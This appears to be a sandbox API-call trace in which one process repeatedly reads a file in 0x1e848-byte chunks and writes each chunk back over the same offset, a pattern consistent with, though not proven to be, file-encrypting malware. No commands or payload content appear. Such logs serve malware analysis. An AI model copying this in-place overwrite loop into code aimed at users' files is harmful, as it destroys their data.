[0116.527] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0116.528] GetProcessHeap () returned 0x500000 [0116.528] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0116.528] GetProcessHeap () returned 0x500000 [0116.528] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0116.528] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x3b9aca0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0116.528] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0116.539] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x3b9aca0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0116.539] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0116.571] GetProcessHeap () returned 0x500000 [0116.571] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0116.571] GetProcessHeap () returned 0x500000 [0116.571] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0116.571] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x3bd7d30, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0116.572] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0116.582] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x3bd7d30, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0116.583] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0116.583] GetProcessHeap () returned 0x500000 [0116.583] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0116.583] GetProcessHeap () returned 0x500000 [0116.583] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0116.583] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x3c14dc0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0116.583] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0116.603] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x3c14dc0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0116.603] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0116.604] GetProcessHeap () returned 0x500000 [0116.604] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0116.604] GetProcessHeap () returned 0x500000 [0116.604] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0116.604] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x3c51e50, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0116.604] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0116.615] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x3c51e50, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0116.615] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0116.616] GetProcessHeap () returned 0x500000 [0116.616] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0116.616] GetProcessHeap () returned 0x500000 [0116.616] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0116.616] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x3c8eee0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0116.616] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0116.680] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x3c8eee0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0116.680] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0116.681] GetProcessHeap () returned 0x500000 [0116.681] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0116.681] GetProcessHeap () returned 0x500000 [0116.681] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0116.681] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x3ccbf70, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0116.681] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0116.691] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x3ccbf70, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0116.691] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0116.691] GetProcessHeap () returned 0x500000 [0116.692] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0116.692] GetProcessHeap () returned 0x500000 [0116.692] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0116.692] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x3d09000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0116.692] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0116.708] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x3d09000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0116.708] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0116.709] GetProcessHeap () returned 0x500000 [0116.709] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0116.709] GetProcessHeap () returned 0x500000 [0116.709] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0116.709] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x3d46090, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0116.709] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0116.765] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x3d46090, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0116.765] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0116.765] GetProcessHeap () returned 0x500000 [0116.765] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0116.765] GetProcessHeap () returned 0x500000 [0116.766] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0116.766] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x3d83120, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0116.766] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0116.775] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x3d83120, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0116.775] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0116.776] GetProcessHeap () returned 0x500000 [0116.776] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0116.776] GetProcessHeap () returned 0x500000 [0116.776] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0116.776] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x3dc01b0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0116.776] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0116.786] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x3dc01b0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0116.786] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0116.787] GetProcessHeap () returned 0x500000 [0116.787] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0116.787] GetProcessHeap () returned 0x500000 [0116.787] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0116.787] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x3dfd240, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0116.787] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0116.825] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x3dfd240, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0116.825] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0116.826] GetProcessHeap () returned 0x500000 [0116.826] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0116.826] GetProcessHeap () returned 0x500000 [0116.826] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0116.826] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x3e3a2d0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0116.826] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0116.836] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x3e3a2d0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0116.836] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0116.837] GetProcessHeap () returned 0x500000 [0116.837] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0116.837] GetProcessHeap () returned 0x500000 [0116.837] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0116.837] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x3e77360, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0116.837] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0116.864] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x3e77360, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0116.864] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0116.865] GetProcessHeap () returned 0x500000 [0116.865] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0116.865] GetProcessHeap () returned 0x500000 [0116.865] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0116.865] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x3eb43f0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0116.865] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0116.875] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x3eb43f0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0116.875] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0116.876] GetProcessHeap () returned 0x500000 [0116.876] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0116.876] GetProcessHeap () returned 0x500000 [0116.876] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0116.876] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x3ef1480, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0116.876] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0116.897] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x3ef1480, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0116.897] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0116.899] GetProcessHeap () returned 0x500000 [0116.899] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0116.899] GetProcessHeap () returned 0x500000 [0116.899] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0116.899] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x3f2e510, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0116.899] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0116.909] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x3f2e510, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0116.909] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0116.909] GetProcessHeap () returned 0x500000 [0116.909] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0116.909] GetProcessHeap () returned 0x500000 [0116.909] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0116.909] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x3f6b5a0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0116.910] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0116.919] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x3f6b5a0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0116.919] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0116.920] GetProcessHeap () returned 0x500000 [0116.920] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0116.920] GetProcessHeap () returned 0x500000 [0116.920] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0116.920] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x3fa8630, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0116.920] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0116.956] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x3fa8630, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0116.956] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0116.957] GetProcessHeap () returned 0x500000 [0116.957] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0116.957] GetProcessHeap () returned 0x500000 [0116.957] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0116.957] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x3fe56c0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0116.957] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0116.975] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x3fe56c0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0116.975] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0116.977] GetProcessHeap () returned 0x500000 [0116.977] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0116.977] GetProcessHeap () returned 0x500000 [0116.977] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0116.977] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x4022750, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0116.977] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0116.986] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x4022750, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0116.986] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0116.987] GetProcessHeap () returned 0x500000 [0116.987] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0116.987] GetProcessHeap () returned 0x500000 [0116.987] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0116.987] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x405f7e0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0116.987] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0117.010] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x405f7e0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0117.010] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0117.011] GetProcessHeap () returned 0x500000 [0117.011] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0117.011] GetProcessHeap () returned 0x500000 [0117.011] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0117.011] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x409c870, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0117.011] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0117.021] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x409c870, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0117.021] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0117.021] GetProcessHeap () returned 0x500000 [0117.021] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0117.021] GetProcessHeap () returned 0x500000 [0117.021] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0117.021] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x40d9900, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0117.021] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) 